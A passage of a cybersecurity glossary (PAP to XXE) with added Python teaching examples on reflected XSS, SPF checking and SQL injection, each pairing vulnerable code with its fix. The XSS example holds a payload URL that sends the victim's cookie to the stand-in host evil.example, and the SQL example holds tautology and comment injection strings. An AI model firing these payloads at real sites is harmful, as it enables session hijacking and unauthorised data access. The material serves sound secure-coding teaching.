A term used to describe a video camera that supports remote directional and zoom control.
Password Authentication Protocol (PAP)
A simple protocol used to authenticate a user to a network access server.
Password-based Key Derivation Function 2 (PBKDF2)
A key derivation function from RSA Laboratories' PKCS #5 standard, published as IETF RFC 2898 and updated by RFC 8018. It applies a pseudorandom function such as HMAC-SHA256 to a password and a random salt for a configurable number of iterations, so that every guess costs an attacker the same work; it is widely used to store password hashes and to derive encryption keys from passwords.
Payment Card Industry Data Security Standard (PCI DSS)
A contractual data security standard initiated by the credit card industry to cover cardholder data.
Peer to Peer (P2P)
A network connection methodology involving direct connection from peer to peer.
Perfect Forward Secrecy (PFS)
A property of a key-exchange protocol whereby compromise of a party's long-term private key does not reveal the session keys of past sessions, because each session derives its keys from fresh ephemeral values (for example ephemeral Diffie-Hellman) that are discarded after use.
Personal Health Information (PHI)
Information related to a person’s medical records, including financial, identification, and medical data.
Personal Identification Number (PIN)
A number that is secret, known only to the user to establish identity.
Personal Identity Verification (PIV)
Policies, procedures, hardware, and software used to securely identify federal workers.
Personally Identifiable Information (PII)
Information that can be used to identify a single person.
Phishing
An attempt to gain sensitive information, such as user account and bank details, for malicious reasons, via an electronic communication, such as email, purporting to be from a trustworthy source. This might be to steal someone’s identity, for financial gain, or both.
PKCS #12 (P12)
A member of the Public-Key Cryptography Standards (PKCS) family published by RSA Laboratories, now RFC 7292, that defines a password-protected container file (.p12 or .pfx) for bundling a private key with its certificate and certificate chain.
Plain Old Telephone Service (POTS)
The term used to describe the old analogue phone service and later the ‘land-line’ digital phone service.
Platform as a Service (PaaS)
A cloud service model which provides a managed environment of hardware and software. This type of service is popular with application developers as it removes the need to maintain the complex infrastructure required.
Pluggable Authentication Modules (PAM [2])
A mechanism used in Linux systems to integrate low-level authentication methods into an API.
Point-to-Point Protocol (PPP)
The Internet standard for transmission of IP packets over a serial line, as in a dial-up connection to an ISP.
Point-to-Point Tunnelling Protocol (PPTP)
A VPN method that carries PPP over Generic Routing Encapsulation (GRE). Its authentication (MS-CHAPv2) and encryption (RC4-based MPPE) have known weaknesses, so it is considered obsolete and should not be used for new deployments.
Pointer (PTR)
A type of DNS record that maps an IP address to a hostname, used for reverse lookups; PTR records live in the in-addr.arpa and ip6.arpa zones.
Port
In computing there are two types of port: hardware ports and network ports. A hardware port is the physical interface between a computer and a peripheral device, such as a monitor, printer, keyboard, or mouse. A network port is a communication endpoint: a logical construct that identifies a specific process or type of network service, at the software level, within an operating system. Ports have a port number and belong to a specific transport protocol (TCP or UDP); for example, TCP port 80 is the well-known port for HTTP by convention, although any service can be bound to any port.
Port Address Translation (PAT)
The most used form of network address translation, where the NAT uses the outgoing IP addresses and port numbers (collectively known as a socket) to map traffic from specific machines in the network.
Portable Electronic Device (PED)
A term used to describe an electronic device, owned by the user, and brought into the enterprise, that uses enterprise data. This includes laptops, tablets, and mobile phones, to name a few.
Post Office Protocol (POP)
One of the two common protocols (the other being IMAP) that mail clients use to retrieve e-mail from a mail server once SMTP has delivered it there.
Potentially Unwanted Program (PUP)
A software program you probably did not want installed on your computer. PUPs are commonly bundled into the installers of other software.
Power Distribution Unit (PDU)
A rack-mounted set of outlets for devices installed in the rack. Connected to the rack’s uninterruptible power supply (UPS).
Pre-Shared Key (PSK)
A shared secret which was previously shared between two parties using some secure channel before it needs to be used.
Pretty Good Privacy (PGP)
A popular encryption program that has the ability to encrypt and digitally sign e-mail and files.
Privacy Enhanced Mail (PEM)
Originally an Internet standard for securing e-mail with cryptographic functions. The name survives mainly for the PEM file format: Base64-encoded keys, certificates and certificate requests wrapped in '-----BEGIN ...-----' and '-----END ...-----' lines.
Private Branch Exchange (PBX)
A telephone exchange that serves a specific business or entity.
Privileged Access Management (PAM [1])
A cyber security strategy and tooling to control, monitor, secure and audit privileged accounts and identities (administrators, service accounts, root) across an IT environment, typically through credential vaulting, session recording and just-in-time elevation.
Protected Extensible Authentication Protocol (PEAP)
A protected version of EAP developed by Cisco, Microsoft, and RSA Security, that functions by encapsulating the EAP frames in a TLS tunnel.
Proxy Auto Configuration (PAC)
A method of automating the connection of web browsers to appropriate proxy services to retrieve a specific URL.
Public Key Cryptography Standards (PKCS)
A series of standards covering aspects of the implementation of public key cryptography.
Public Key Infrastructure (PKI)
Infrastructure for binding a public key to a known user through a trusted intermediary, typically a certificate authority.
RACE Integrity Primitives Evaluation Message Digest (RIPEMD)
A family of hash functions developed openly under the RACE project. RIPEMD-160, which produces a 160-bit message digest, is the most widely used variant; 128-, 256- and 320-bit versions also exist. The original 128-bit RIPEMD is considered broken.
Radio Frequency Identification (RFID)
A technology used for remote identification via radio waves.
Rapid Application Development (RAD)
A software development methodology that favours the use of rapid prototypes and changes as opposed to extensive advanced planning.
Rapid Security Response (RSR)
A feature from Apple, that delivers important security improvements to devices running iOS, iPadOS and macOS, between the regular software updates.
Real-time Operating System (RTOS)
An operating system designed to work in a real-time environment.
Real-time Transport Protocol (RTP)
A protocol for a standardised packet format used to carry audio and video traffic over IP networks.
Recovery Point Objective (RPO)
The amount of data a business is willing to place at risk. It is determined by the amount of time a business has to restore a process before an unacceptable amount of data loss results from a disruption.
Recovery Time Objective (RTO)
The amount of time a business has to restore a process before unacceptable outcomes result from a disruption.
Redundant Array of Independent or Inexpensive Disks (RAID)
A method for creating a fault tolerant storage system. RAID uses multiple hard drives in various configurations to offer different levels of speed and data redundancy.
Reflected Cross-site Scripting (RXSS)
A vulnerability that arises when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
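Added example (not part of the original glossary): the reflected XSS pattern described above, shown as a vulnerable page handler beside its fixed version. The handlers, the hostnames and the attack URL are constructed for illustration; the fix is output encoding at the point where the untrusted value is inserted into HTML.

```python
import html
from urllib.parse import parse_qs, urlparse


def _query_param(url: str, name: str) -> str:
    """Return the first value of query parameter `name`, or '' if absent."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def search_page_vulnerable(url: str) -> str:
    """Reflects the `q` parameter into the HTML body unchanged.

    Whatever the attacker placed in the URL becomes markup in the victim's page.
    """
    q = _query_param(url, "q")
    return "<h1>Results for: " + q + "</h1>"


def search_page_fixed(url: str) -> str:
    """Same page with output encoding applied where the value is inserted.

    html.escape(quote=True) turns < > & " ' into entities, so the browser
    renders attacker input as text instead of parsing it as tags or attributes.
    Encoding is context-specific: this is right for an HTML element body, but a
    value placed inside a <script> block, a URL or an event-handler attribute
    needs the encoding appropriate to that context.
    """
    q = _query_param(url, "q")
    return "<h1>Results for: " + html.escape(q, quote=True) + "</h1>"


# Constructed attack URL: the victim is lured into following it, and the
# reflected script sends their session cookie to a host the attacker controls.
PAYLOAD_URL = (
    "https://app.example/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def reflects_script(page: str) -> bool:
    """Crude check used only to show the difference: is there a live <script> tag?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print(search_page_vulnerable(PAYLOAD_URL))
    print(search_page_fixed(PAYLOAD_URL))
```

Setting the session cookie with the HttpOnly flag and deploying a Content Security Policy limit what an injected script can do, but neither replaces encoding the output.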
Registration Agent (RA [1])
The component of a PKI that verifies the identity of a certificate applicant and establishes the registration parameters before the certificate authority issues the certificate. More commonly called a Registration Authority.
Remote Access Server (RAS)
A combination of hardware and software used to enable remote access to a network.
Remote Access Trojan (RAT)
Malware that gives an attacker covert remote control of a compromised system, typically including file transfer, command execution, keylogging, and screen or camera capture.
Remote Authentication Dial-in User Service (RADIUS)
A standard protocol for providing authentication services that is commonly used in dial-up, wireless, and PPP environments.
Remote Code Execution (RCE)
A type of attack that allows an attacker to remotely execute malicious code on a computer resulting in, for example, malware execution or gaining full control over the compromised machine.
Remote Desktop Protocol (RDP)
Protocol used for Microsoft's Remote Desktop tool.
Remote File Inclusion (RFI [2])
A type of vulnerability that allows an attacker to include a file, usually exploiting a dynamic file inclusion mechanism implemented in the target application. This vulnerability exists where there isn’t appropriate user input validation.
Remotely Triggered Black Hole (RTBH)
A denial-of-service mitigation technique in which a BGP announcement causes routers to forward traffic for a victim address (or from an attacking source) to a null interface, discarding it at the network edge before it reaches the target.
Research and Development in Advanced Communications Technologies in Europe (RACE)
A program launched in the 1980s by the Commission of European Communities to pave the way towards commercial use of Integrated Broadband Communication (IBC) in Europe in the late 1990s.
Return on Investment (ROI)
A measure of the effectiveness of the use of capital.
Rivest Cipher version 4 (RC4)
A streaming symmetric-key algorithm. No longer secure due to the many vulnerabilities that have been discovered since its initial implementation.
Rivest, Shamir, & Adleman (RSA)
The names of the three men who developed a public key cryptographic system and the company they founded to commercialise the system.
Role-based Access Control (RBAC [1])
Roles within an organisation are assigned access permissions necessary to carry out those roles. These are in turn assigned to specific users that fulfil the roles within the organisation.
Router Advertisements (RA [2])
On multicast-capable links and point-to-point links, each router periodically sends to the multicast group a router advertisement packet that announces its availability. A host receives router advertisements from all routers, building a list of default routers. Routers generate router advertisements frequently enough so that hosts learn of their presence within a few minutes. However, routers do not advertise frequently enough to rely on an absence of advertisements to detect router failure. A separate detection algorithm that determines neighbour unreachability provides failure detection.
Routing Information Protocol (RIP)
A routing protocol. Version 1 had several shortcomings, with a maximum hop count of 15 and a routing table update interval of 30 seconds, causing every router on a network to send out its table at once. Version 2 added support for CIDR and fixed some of the issues with version 1, but maximum hop count remained.
Rule-based Access Control (RBAC [2])
A series of rules are contained within an access control list to determine whether access should be granted or not, for example, don’t allow access to certain files outside of working hours during the week or on weekends.
Secure Access Service Edge (SASE)
A cloud-based security framework that provides secure access to network resources from anywhere.
Secure Copy Protocol (SCP)
A means of securely transferring files between a local host and a remote host, or between two remote hosts, over an SSH connection.
Secure File Transfer Protocol (SFTP [1])
Uses SSH to provide the encryption for secure file transfer.
Secure Hashing Algorithm (SHA)
A family of hashing algorithms published by NIST. SHA-1 produces a 160-bit digest and is deprecated because practical collisions have been demonstrated; the SHA-2 family is named by digest length (SHA-224, SHA-256, SHA-384 and SHA-512), and SHA-3 is a later, structurally different family.
Secure Hypertext Transfer Protocol (SHTTP)
An alternative to HTTPS in which only the transmitted pages and POST fields are encrypted. Not widely used following the widespread adoption of HTTPS.
Secure Real-time Protocol (SRTP)
A secure version of the standard protocol for a standardised packet format used to carry audio and video traffic over IP networks.
Secure Shell (SSH)
An encrypted remote terminal protocol and program used to log in to and run commands on a remote server. SSH uses public-key cryptography to authenticate the server and negotiate session keys, and symmetric encryption for the session itself. The client must verify the server's host key through an independent channel, or accept it on first use and pin it thereafter; otherwise a man-in-the-middle can impersonate the server.
Secure Sockets Layer (SSL)
A protocol developed by Netscape for transmitting private data over the internet. During the handshake it uses public-key cryptography to authenticate the server and agree a session key, and then symmetric encryption for the data itself. All SSL versions are deprecated and have been superseded by Transport Layer Security (TLS), although 'SSL' is still used loosely to mean TLS.
Secure Web Gateway (SWG)
An on-premise or cloud-delivered network security service. Sitting between users and the Internet, secure web gateways provide advanced network protection by inspecting web requests against company policy to ensure malicious applications and websites are blocked and inaccessible.
Secure/Multipurpose Internet Mail Extensions (S/MIME)
An encrypted implementation of the MIME protocol specification.
Security Assertions Markup Language (SAML)
An XML-based standard for exchanging authentication and authorisation data.
Security Content Automation Protocol (SCAP)
A method of using specific protocols and data exchanges to automate the determination of vulnerability management, measurement, and policy compliance across a system or set of systems.
Security Information and Event Management (SIEM)
A two-part process consisting of security event management (SEM), which performs real-time monitoring of security events and security information management (SIM), where the monitoring log files are reviewed and analysed by automated and human interpreters.
Security Operations Centre (SOC [1])
The grouping of security operations in an enterprise.
Security Orchestration, Automation, Response (SOAR)
A system designed to facilitate responses in incident response situations.
Security-enhanced Linux (SE Linux)
A security enhancement to Linux that allows users and administrators more control over access control. Standard Linux access controls allow a user, and the applications the user runs, to specify who has read, write, and execute permissions on a file, whereas SE Linux access controls are determined by a policy loaded on the system, which cannot be changed by careless users or misbehaving applications.
Security, Trust, Assurance, Risk (STAR)
A globally recognized cloud security assurance program developed by the Cloud Security Alliance (CSA). It promotes transparency, rigorous auditing, and harmonisation of security standards to help cloud service providers (CSPs) validate and communicate their security posture. The program is built on the Cloud Controls Matrix (CCM), a comprehensive framework of 197 control objectives across 17 domains, which assesses cloud-specific security, privacy, and compliance controls.
Self-Encrypting Drives (SED)
A data drive that has built-in encryption capability in the drive controller itself.
Sender Policy Framework (SPF)
An e-mail validation system designed to detect e-mail spoofing. The domain owner publishes, in a DNS TXT record, the hosts authorised to send mail for the domain, and a receiving server checks the connecting sender's IP address against that record. SPF validates the envelope sender only, so it is normally combined with DKIM and DMARC.
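Added example (not part of the original glossary): a simplified SPF evaluator that checks a sending IP address against a published record. The records are constructed and served from an in-memory table in place of real DNS TXT lookups; it handles the ip4, ip6, include and all mechanisms and the four qualifiers, and caps include recursion as RFC 7208 does. The a, mx, exists and redirect terms are out of scope here.

```python
import ipaddress

# Constructed records standing in for DNS TXT lookups of each domain.
DNS_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 include:mail.example.net -all",
    "mail.example.net": "v=spf1 ip4:198.51.100.10 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_INCLUDE_DEPTH = 10  # RFC 7208 limits DNS-querying terms to 10 per check


def check_spf(domain, sender_ip, lookup=DNS_TXT.get, depth=0):
    """Return pass, fail, softfail, neutral, none or permerror for sender_ip."""
    if depth > MAX_INCLUDE_DEPTH:
        return "permerror"
    record = lookup(domain)
    if record is None:
        return "none"
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(sender_ip)

    for term in terms[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()

        if name in ("ip4", "ip6"):
            try:
                network = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
            # An IPv6 sender never matches an ip4 network, and vice versa.
            if ip in network:
                return QUALIFIERS[qualifier]
        elif name == "include":
            inner = check_spf(arg, sender_ip, lookup, depth + 1)
            if inner in ("none", "permerror"):
                return "permerror"  # the included domain must have a valid record
            if inner == "pass":
                return QUALIFIERS[qualifier]
            # any other inner result means "no match"; keep evaluating
        elif name == "all":
            return QUALIFIERS[qualifier]
        # unsupported mechanisms and modifiers are ignored in this simplified evaluator

    return "neutral"  # no term matched and no "all" was present


if __name__ == "__main__":
    for ip in ("192.0.2.77", "198.51.100.10", "203.0.113.5", "2001:db8:1::1"):
        print(ip, check_spf("example.com", ip))
```

A receiving server applies this to the IP of the host that connected to it, against the domain in the envelope MAIL FROM; "fail" with "-all" is a hard rejection signal, while "softfail" is normally only an input to spam scoring.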
Server-side Request Forgery (SSRF)
A type of computer security exploit where an attacker abuses the functionality of a server causing it to access or manipulate information in the realm of that server that would otherwise not be directly accessible to the attacker.
Service Level Agreement (SLA)
A document between a customer and service provider that defines the scope, quality, and terms of the service to be provided.
Service Level Objective (SLO)
An agreed upon target within a Service Level Agreement (SLA) that must be achieved for each activity, function, and process to provide the best opportunity for customer success.
Service Record (SRV)
DNS record that associates servers for individual protocols with a domain. SRV records specify a host, port, protocol, and other details for a specific service. For example, VoIP clients can readily discover a domain’s associated SIP server.
Short Message Service (SMS)
A form of text messaging over phone and mobile phone circuits that allows up to 160-character messages to be carried over signalling channels.
Simple Certificate Enrolment Protocol (SCEP)
A protocol used in PKI for enrolment and other services.
Simple Mail Transfer Protocol (SMTP)
The main protocol used to send email over the internet.
Simple Mail Transfer Protocol Secure (SMTPS)
The secure version of the standard Internet protocol used to transfer e-mail between hosts.
Simple Network Management Protocol (SNMP)
A set of standards for communication with network devices, such as switches and routers, connected to a TCP/IP network. Used for network management.
Simple Object Access Protocol (SOAP)
An XML-based specification for exchanging information associated with web services.
Simultaneous Authentication of Equals (SAE)
A secure key negotiation and exchange method for password-based authentication. It is a variant of the Dragonfly key exchange protocol specified in RFC 7664, which in turn is based on the Diffie-Hellman key exchange, and it resists offline dictionary attacks against the password. It is used with Wi-Fi Protected Access 3 (WPA3) and IEEE 802.11 WLAN mesh networks, amongst other things.
Single Loss Expectancy (SLE)
Monetary loss or impact of each occurrence of a threat. SLE = asset value x exposure factor.
Single Sign-On (SSO)
An authentication process by which the user can enter a single user ID and password and then move from application to application or resource to resource without having to supply further authentication information.
SMShing
An attempt to gain sensitive information, such as user account and bank details, for malicious reasons, via an SMS message, purporting to be from a trustworthy source. This might be to steal someone’s identity, for financial gain, or both.
Social Engineering
The use of deception to manipulate an individual into divulging confidential or personal information that may be used for fraudulent purposes.
Software as a Service (SaaS)
Cloud service model that provides centralised applications accessed over a network.
Software Development Kit (SDK)
A collection of software development tools that facilitate the creation of software, which can include a software framework, compiler and debugger.
Software Development Life Cycle (SDLC)
A process used by the software industry to design, develop and test high quality software. The Software Development Life Cycle typically consists of stages such as planning and requirements analysis, definition of requirements, design, build, test, deploy and maintain. A number of different Software Development Life Cycle models are in use today, including the waterfall model, the iterative model, the spiral model, the V-model and the big bang model.
Software Development Life-cycle Methodology (SDLM)
The processes and procedures employed to develop software. Sometimes also called secure development lifecycle model when security is part of the development process.
Software-Defined Network (SDN)
Programming that allows a master controller to determine how network components will move traffic through the network. Used in virtualisation.
Software-defined Visibility (SDV)
A framework that enables visibility into network operations and functions.
Software-Defined WAN (SDWAN)
A wide area network that uses software-defined network technology, such as communicating over the Internet using overlay tunnels which are encrypted when destined for internal organisation locations.
Software-defined Wide Area Network (SD-WAN)
A virtual wide area network architecture that allows enterprises to connect users securely and efficiently to applications. Software is used to control the connectivity, management and services between data centres, remote offices, and cloud resources.
Solid State Disk/Drive (SSD)
A mass storage device, such as a hard drive, that is composed of electronic memory as opposed to a physical device made up of spinning platters.
Spam over Instant Messaging (SPIM)
Spam sent over an instant messaging channel.
Spoofing
Spoofing is a fraudulent or malicious activity whereby a communication is sent from an unknown source disguised as a source that is known to the receiver. E-mail spoofing is a particular type of spoofing where the header of an e-mail is forged to appear as though it is from a particular sender when it is in fact from an unknown source.
SSH File Transfer Protocol (SFTP [2])
A secure file transfer subsystem associated with Secure Shell (SSH).
Start of Authority (SOA)
DNS record that defines the primary name server in charge of a domain. Also includes parameters that control how secondary name servers check for updates to the zone file, such as the serial number which indicates whether the zone file has updates to fetch.
Statement of Work (SOW)
A document used in project management, that provides a narrative description of the work requirements for a project. It includes a definition of project activities, deliverables and timelines for an organisation providing services to a client.
Storage Area Network (SAN [1])
A dedicated high-speed network that presents pools of block storage to servers as logical disks, usually over Fibre Channel or iSCSI, so that the operating system sees them as locally attached drives.
Structured Exception Handler (SEH)
The mechanism the Windows operating system uses to handle hardware and software exceptions. On 32-bit Windows the chain of handler records lives on the stack, so a stack buffer overflow can overwrite a handler pointer and hijack control flow; the SafeSEH and SEHOP mitigations were introduced to block this.
Structured Query Language (SQL)
A language created by IBM that relies on simple English statements to perform database queries. SQL enables databases from different manufacturers to be queried using a standard syntax.
Structured Query Language Injection (SQLi)
An attack in which attacker-supplied input is incorporated into a SQL query that the application builds by concatenating strings, so that the input changes the logic of the query rather than being treated as data. A successful injection can bypass authentication, read or modify data and, depending on the database, execute commands on the server. The primary defence is parameterised queries (prepared statements), which keep data separate from SQL code.
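Added example (not part of the original glossary): the injection described above, shown against an in-memory SQLite table with constructed rows, as a concatenated query beside its parameterised replacement. The tautology payload is the classic one; the same technique applies to any database driver that accepts bound parameters.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table populated with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "hash-a", "admin"),
        ("bob", "hash-b", "user"),
    ])
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Builds the query by string concatenation.

    The input is spliced into the SQL text, so a quote in it ends the
    string literal and the rest is parsed as SQL.
    """
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterised query.

    The SQL text is fixed; the driver sends the value separately and it is
    only ever compared as data, quotes and all.
    """
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed payload: turns WHERE username = 'x' OR '1'='1' into a tautology.
TAUTOLOGY = "x' OR '1'='1"
# Constructed payload: a trailing comment swallows the closing quote.
COMMENT = "alice'--"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, TAUTOLOGY))
    print("safe:      ", find_user_safe(db, TAUTOLOGY))
```

Parameterisation covers values only. Identifiers such as table or column names and keywords such as sort direction cannot be bound, so where they come from user input they must be checked against an allow-list.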
Structured Threat Information eXpression (STIX)
A framework for passing threat information across automated interfaces.
Subject Alternative Name (SAN [2])
A field in a certificate that has several uses, for example, for a machine, it can represent its Fully Qualified Domain Name (FQDN), for a user, it can be the User Principal Name (UPN), and for an SSL certificate, it can indicate multiple domains for which the certificate is valid.
Subscriber Identity Module (SIM)
An integrated circuit or hardware element that securely stores the International Mobile Subscriber Identity (IMSI) and the related key used to identify and authenticate subscribers on mobile telephones.
Supervisory Control and Data Acquisition (SCADA)
A system that has the basic components of a distributed control system (DCS), yet is designed for large-scale, distributed processes and functions with the idea that remote devices may or may not have ongoing communication with the central control.
Switch
An electronic device that provides a common point for the connection of network devices, which replaced Hubs. A switch will learn the MAC address of all connected devices when they first connect. This means that it can forward data to the correct device, rather than to all connected devices, as with a Hub.
System and Organisation Controls 2 (SOC2)
A cyber security and data protection framework developed by the American Institute of Certified Public Accountants (AICPA) that is designed to evaluate and validate a service organisation's information security practices, particularly those related to protecting customer data.
System Log (SYSLOG)
System log collector in macOS and Linux. Useful for auditing, performance monitoring, and troubleshooting.
System on Chip (SoC [2])
The integration of complete system functions on a single chip in order to simplify construction of devices.
Tactics, Techniques, and Procedures (TTP)
The methods used by an adversary, organised in a fashion to assist in identification and defence.
Telecommunications Industry Association/Electronic Industries Alliance (TIA/EIA)
The standards body that defines most of the standards for computer network cabling. Many of these standards are defined under the ANSI/TIA-568 standard. Since the Electronics Industry Association (EIA) was accredited by the American National Standards Institute (ANSI) to develop the standards, the name changed from TIA/EIA to ANSI/TIA after the EIA closed in 2011.
Temporal Key Integrity Protocol (TKIP)
A deprecated encryption standard used in WPA that provided a new encryption key for every sent packet.
Terminal Access Controller Access Control System Plus (TACACS+)
A proprietary protocol developed by Cisco to support Authorisation, Authentication, and Accounting (AAA) in a network with many routers and switches. It is like RADIUS in function but uses TCP port 49 by default and separates AAA into different parts.
Text (TXT)
A DNS record in text format, which contains information about a domain, as well as details that help external network servers and services handle outgoing email from a domain. These records can be used to verify domain ownership, ensure email security, and prevent spam or phishing.
Threat Actor
An individual or group who are responsible for an attack or security incident against another individual or organisation.
Ticket Granting Ticket (TGT)
A part of the Kerberos authentication system that is used to prove identity when requesting service tickets.
Time-based One Time Password (TOTP)
A password that is used once and is only valid during a specific time period.
Time-of-check (TOC)
Refers to the time a value of something is checked in a multithreaded application.
Time-of-use (TOU)
Refers to the time a value of something is used in a multithreaded application. The greater the separation between the time a program checks a value, and when it uses the value, the more likely it is for problems such as race conditions to arise.
Transaction Signature (TSIG)
A protocol used as a means of authenticating dynamic DNS records during DNS updates.
Transmission Control Protocol (TCP)
A Layer 4 connection-oriented protocol within the TCP/IP suite. TCP provides a reliable communications channel over an unreliable network by ensuring all packets are accounted for and retransmitted if any are lost.
Transmission Control Protocol/Internet Protocol (TCP/IP)
A set of communication protocols, developed by the U.S. Department of Defence, which enable dissimilar computers to share information over a network.
Transport Layer Security (TLS)
A protocol where hosts use public-key cryptography to securely negotiate a cipher and symmetric key over an unsecured network, and then use the symmetric key to encrypt the rest of the session. TLS is the current name for the historical SSL protocol.
Triple Data Encryption Standard (3DES)
Three rounds of DES encryption used to improve security.
Trivial File Transfer Protocol (TFTP)
A protocol that transfers files between servers and clients, without the need for user login. Devices that need an operating system, but have no local hard disk (for example, diskless workstations and routers), often use TFTP to download their operating systems.
Trusted Automated eXchange of Indicator Information (TAXII)
A transport framework for STIX data communication.
Trusted Platform Module (TPM)
A hardware chip to enable trusted computing platform operations.
Unified Endpoint Management (UEM)
The aggregation of multiple products into a single system on an endpoint for efficiency purposes.
Unified Extensible Firmware Interface (UEFI)
A specification that defines the interface between an operating system and the hardware firmware. It is a replacement for BIOS.
Unified Threat Management (UTM)
The aggregation of multiple network security products into a single appliance for efficiency purposes.
Uniform Resource Identifier (URI)
A set of characters used to identify the name of a resource in a computer system. A URL is a form of URI.
Uniform Resource Locator (URL)
An address that defines the type and the location of a resource on the Internet. URLs are used in almost every TCP/IP application.
Uninterruptible Power Supply (UPS)
A source of power, usually a battery, that is designed to provide uninterrupted power to a computer system in the event of a temporary loss of power.
Universal Serial Bus (USB)
A common interface that enables communication between devices and a host controller such as a personal computer (PC) or smartphone. It connects peripheral devices such as digital cameras, mice, keyboards, printers, scanners, media devices, external hard drives, and flash drives. Because of its wide variety of uses, including support for electrical power, USB has replaced a wide range of interfaces like the parallel and serial port.
Unmanned Aerial Vehicle (UAV)
A remotely piloted flying vehicle.
Unshielded Twisted Pair (UTP)
A popular cabling for telephone and computer networks composed of pairs of wires twisted around each other at specific intervals. The twists serve to reduce interference, or crosstalk, as it is sometimes known. The more twists, the less interference. The cable has no metallic shielding to protect the wires from external interference, unlike Shielded Twisted Pair (STP). UTP is available in a variety of grades, called categories.
USB On-The-Go (USB OTG)
A standardised specification that allows a device to read data from a USB device without requiring a PC.
User Acceptance Testing (UAT)
The application of acceptance-testing criteria to determine fitness for use according to end-user requirements.
User Access Control (UAC)
Mandatory access control enforcement facility introduced with Microsoft Windows Vista and Windows Server 2008, with a more relaxed version in Windows 7, 8, 10, Server 2008 R2 and 2012.
User and Entity Behaviour Analytics (UEBA)
A security process that uses user behaviour patterns to determine anomalies.
User Datagram Protocol (UDP)
Connectionless protocol in the TCP/IP suite. Has less overhead and better performance than TCP, but also a higher risk of errors. Fire-and-forget UDP datagrams do a lot of important behind-the-scenes work in a TCP/IP network.
Variable Length Subnet Masking (VLSM)
The process of using variable-length subnets to create subnets within subnets.
Video Teleconferencing (VTC)
A business process of using video signals to carry audio and visual signals between separate locations, thus allowing participants to meet via a virtual meeting instead of traveling to a physical location.
Virtual Desktop Environment (VDE)
The use of virtualisation technology to host desktop systems on a centralised server.
Virtual Desktop Infrastructure (VDI)
The use of servers to host virtual desktops by moving the processing to the server and using the desktop machine as merely a display terminal.
Virtual Local Area Network (VLAN)
A common feature among managed switches that enables a single switch to support multiple Layer 2 broadcast domains and provide isolation between hosts on different VLANs. Critical for modern network performance and security.
Virtual Machine (VM)
A virtual computer accessed through a class of programs called a hypervisor or virtual machine monitor. A virtual machine runs inside your actual operating system, essentially enabling you to run two or more operating systems at once.
Virtual Private Cloud (VPC)
A cloud instance that is virtually isolated by the provider.
Virtual Private Network (VPN)
A network configuration that enables a remote user to access a private network via the Internet. VPNs employ an encryption methodology called tunnelling, which protects the data from interception.
Vishing
An attempt to gain sensitive information, such as user account and bank details, for malicious reasons, via the telephone, purporting to be from a trustworthy source. This might be to steal someone’s identity, for financial gain, or both.
Visual Basic for Applications (VBA)
A Microsoft specification for using Visual Basic in applications such as the Office Suite.
Voice over Internet Protocol (VoIP)
The use of an IP network to conduct voice calls.
Web Application Firewall (WAF)
A firewall that operates at the application level, specifically designed to protect web applications by examining requests at the application stack level.
Wi-Fi Protected Access (WPA)
A wireless security protocol that addresses weaknesses and acts as an upgrade to WEP. WPA offers security enhancements such as dynamic encryption key generation (keys are issued on a per-user and per-session basis), an encryption key integrity-checking feature, user authentication through the industry standard Extensible Authentication Protocol (EAP), and other advanced features that WEP lacks. WPA has been replaced by the more secure WPA2.
Wi-Fi Protected Setup (WPS)
A network security standard that allows easy setup of a wireless home network.
Wired Equivalent Privacy (WEP)
The encryption scheme used to attempt to provide confidentiality and data integrity on 802.11 networks.
Wireless Access Point (WAP)
Connects wireless network nodes to wireless or wired networks. Many WAPs are combination devices that act as high-speed hubs, switches, bridges, and routers, all rolled into one.
Wireless Internet Service Provider (WISP)
An internet service provider for which the last segment or two uses a point-to-point long-range fixed wireless connection.
Wireless Intrusion Detection System (WIDS)
An intrusion detection system established to cover a wireless network.
Wireless Intrusion Prevention System (WIPS)
An intrusion prevention system established to cover a wireless network.
Wireless Local Area Network (WLAN)
A network that allows devices to connect and communicate wirelessly.
Wireless Mesh Network (WMN)
A hybrid wireless network topology in which most nodes connect in a mesh network while also including some wired machines. Nodes act like routers by forwarding traffic for other nodes, but without wires.
Wireless TLS (WTLS)
A protocol based on the Transport Layer Security (TLS) protocol, that provides reliability and security for wireless communications using the Wireless Application Protocol (WAP). It is necessary due to the limited memory and processing abilities of some WAP enabled mobile devices.
Wireless Wide Area Network (WWAN)
A form of wireless network over a wide area, which utilises cellular network technologies, such as 4G LTE and 5G to transfer data.
Work Order (WO)
A task or job for a customer that can be scheduled or assigned to a particular person.
World Wide Web Consortium (W3C)
An international body that maintains web-related rules and frameworks, comprising over 350 member organisations, which jointly develop web standards, run outreach programs, and maintain an open forum for talking about the Web.
XML External Entity (XXE)
A security vulnerability that allows a threat actor to inject unsafe XML entities into a web application that processes XML data. This can lead to the threat actor being able to interact with systems the application can access, view files on the server, and in some cases, perform remote code execution (RCE).
Zed Attack Proxy (ZAP)
